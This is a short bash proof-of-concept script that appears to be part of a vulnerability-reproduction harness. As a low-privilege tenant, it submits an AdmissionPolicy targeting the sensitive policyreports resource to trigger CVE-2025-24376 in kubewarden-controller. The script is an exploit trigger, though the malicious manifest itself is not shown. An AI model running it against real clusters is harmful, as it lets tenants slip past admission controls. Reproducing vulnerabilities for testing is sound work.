#!/usr/bin/env bash
# CVE-2025-24376 — kubewarden-controller missing sensitive-resource validation.
#
# Acting ONLY as the low-privilege attacker actor (namespaced RBAC on
# admissionpolicies in tenant-a, NOT cluster-admin), submit an AdmissionPolicy
# whose rule targets the sensitive resource wgpolicyk8s.io/policyreports.
#
# On the vulnerable controller (v1.20.1) the validating webhook
# vadmissionpolicy.kb.io accepts and persists the object. On the fixed
# controller (>=1.21.0) the same submission is rejected with a Forbidden
# validation error from validateRulesField.
#
# This script ONLY triggers the bug (submits the policy). It does not verify
# persistence — the verifier confirms that through the independent admin channel.
#
# Args:
#   $1 = attacker kubeconfig path
#   $2 = malicious AdmissionPolicy manifest path
set -euo pipefail

ATTACKER_KUBECONFIG="$1"
POLICY_MANIFEST="$2"
KUBECTL=/usr/local/bin/kubectl

echo "[*] Acting as attacker actor:"
KUBECONFIG="$ATTACKER_KUBECONFIG" "$KUBECTL" auth whoami

echo "[*] Submitting malicious AdmissionPolicy targeting wgpolicyk8s.io/policyreports ..."
KUBECONFIG="$ATTACKER_KUBECONFIG" "$KUBECTL" apply -f "$POLICY_MANIFEST"

echo "[*] Submission completed without webhook rejection (vulnerable controller accepted it)."